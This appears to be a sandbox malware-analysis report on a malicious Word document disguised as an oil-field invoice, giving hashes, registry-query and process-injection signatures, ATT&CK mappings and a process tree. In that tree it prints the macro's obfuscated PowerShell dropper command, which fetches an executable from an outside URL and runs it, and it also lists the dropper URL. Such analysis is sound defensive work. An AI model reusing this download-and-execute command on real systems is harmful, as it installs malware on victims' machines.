4821e3c96ac5b45216470c24fe904e41c6060e8b392ed6265807b4c59e6d39b1

General

Target

Invoice- 0535254 Oil_Field_4568742.doc
Size

55KB
MD5

e70320db1a53b3226e73d2b8124b2073
SHA1

119ac671f8030a7395030273931120b6e52b3d4d
SHA256

4821e3c96ac5b45216470c24fe904e41c6060e8b392ed6265807b4c59e6d39b1
SHA512

c964a9a959a224d938b8251b97fe3a31483d8eca5eeaa7886450e44d048ecc30c52331158865f33e14b03f03cc7ea236ae6f69b7760eb25bb414b829a59f8df6

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://secure04sd.my03.com/a/oleApp13.exe

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	3136	652	cmd.exe	WINWORD.EXE

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

652 WINWORD.EXE
652 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

2960 powershell.exe
2960 powershell.exe
2960 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2960 powershell.exe
Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

WINWORD.EXE

pid process

652 WINWORD.EXE
652 WINWORD.EXE
652 WINWORD.EXE
652 WINWORD.EXE
652 WINWORD.EXE
652 WINWORD.EXE
652 WINWORD.EXE

pid	process
652	WINWORD.EXE
652	WINWORD.EXE

pid	process
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2960	powershell.exe

pid	process
652	WINWORD.EXE
652	WINWORD.EXE
652	WINWORD.EXE
652	WINWORD.EXE
652	WINWORD.EXE
652	WINWORD.EXE
652	WINWORD.EXE

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

WINWORD.EXEcmd.exe

description	pid	process	target process
PID 652 wrote to memory of 3136	652	WINWORD.EXE	cmd.exe
PID 652 wrote to memory of 3136	652	WINWORD.EXE	cmd.exe
PID 3136 wrote to memory of 2960	3136	cmd.exe	powershell.exe
PID 3136 wrote to memory of 2960	3136	cmd.exe	powershell.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Invoice- 0535254 Oil_Field_4568742.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Documents\questionpolitics.cmd" "
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3136

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w hi sleep -Se 31;Start-BitsTransfer -Source htt`ps://secure04sd.my03.com/a/oleApp13.e`xe -Destination C:\Users\Public\Documents\happyalmost.e`xe;C:\Users\Public\Documents\happyalmost.e`xe
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2960

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\Documents\questionpolitics.cmd
MD5
5f4bcdc965cc9739a817de56d7ca2846

SHA1
24d45c0d986d4ba7074da5f671d5288626dba3c3

SHA256
7a16b7becdfe4e0598f559ab176ac97641ec0030b7da324b7dd2e659b20bec9d

SHA512
9694cdb38eba0bccf109fe036aef3067f7d132a747738b1e7284cde76e2e90cd07bf4fce5a588cc3eee9a7ffa0731efc91692232a3e83eaad797068f6803f371

Download Submit
memory/652-117-0x00007FFDB5990000-0x00007FFDB59A0000-memory.dmp

Filesize
64KB

Download
memory/652-115-0x00007FFDB5990000-0x00007FFDB59A0000-memory.dmp

Filesize
64KB

Download
memory/652-114-0x00007FFDB5990000-0x00007FFDB59A0000-memory.dmp

Filesize
64KB

Download
memory/652-118-0x00007FFDB5990000-0x00007FFDB59A0000-memory.dmp

Filesize
64KB

Download
memory/652-120-0x0000028F4DE80000-0x0000028F4DE82000-memory.dmp

Filesize
8KB

Download
memory/652-119-0x0000028F4DE80000-0x0000028F4DE82000-memory.dmp

Filesize
8KB

Download
memory/652-121-0x0000028F4DE80000-0x0000028F4DE82000-memory.dmp

Filesize
8KB

Download
memory/652-116-0x00007FFDB5990000-0x00007FFDB59A0000-memory.dmp

Filesize
64KB

Download
memory/2960-274-0x000001BA76250000-0x000001BA76252000-memory.dmp

Filesize
8KB

Download
memory/2960-260-0x0000000000000000-mapping.dmp

Download
memory/2960-275-0x000001BA76253000-0x000001BA76255000-memory.dmp

Filesize
8KB

Download
memory/2960-417-0x000001BA76256000-0x000001BA76258000-memory.dmp

Filesize
8KB

Download
memory/2960-418-0x000001BA76258000-0x000001BA76259000-memory.dmp

Filesize
4KB

Download
memory/3136-258-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads